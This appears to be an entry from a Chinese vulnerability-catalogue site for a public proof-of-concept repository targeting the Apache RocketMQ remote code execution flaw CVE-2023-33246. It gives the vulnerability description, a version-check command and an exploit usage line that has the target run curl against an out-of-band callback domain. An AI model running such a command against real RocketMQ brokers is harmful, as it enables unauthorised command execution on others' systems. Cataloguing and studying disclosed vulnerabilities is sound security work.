漏洞平台

POC详情： 1a6f87a51bff4c96565ac6409c72e47766dead69

来源

https://github.com/MkJos/CVE-2023-33246_RocketMQ_RCE_EXP

关联漏洞

标题： Apache RocketMQ 代码注入漏洞 (CVE-2023-33246)
描述：Apache RocketMQ是美国阿帕奇（Apache）基金会的一款轻量级的数据处理平台和消息传递引擎。 Apache RocketMQ 5.1.0及之前版本存在代码注入漏洞，该漏洞源于存在远程命令执行漏洞，攻击者可以利用该漏洞利用更新配置功能以系统用户身份执行命令。

介绍

# CVE-2023-33246_RocketMQ_RCE_EXP
CVE-2023-33246 RocketMQ Remote Code Execution Exploit

## Overview
RocketMQ versions 5.1.0 and below are vulnerable to Arbitrary Code Injection. Broker component of RocketMQ is leaked on the extranet and lack permission verification. An attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content.

## Detect RocketMQ version to identify vulnerabilities
### usage examples
**check**
```bash
./RocketMQRceCheck -host 127.0.0.1 -port 9876
```
**exploit**
```bash
RocketMQ_RCE_EXPLOIT 127.0.0.1 10911 curl chw9ft72vtc00002z5k0ge6rz7eyyyyyb.oast.fun/test
```

文件快照


 [4.0K]  /data/pocs/1a6f87a51bff4c96565ac6409c72e47766dead69
└── [ 776]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。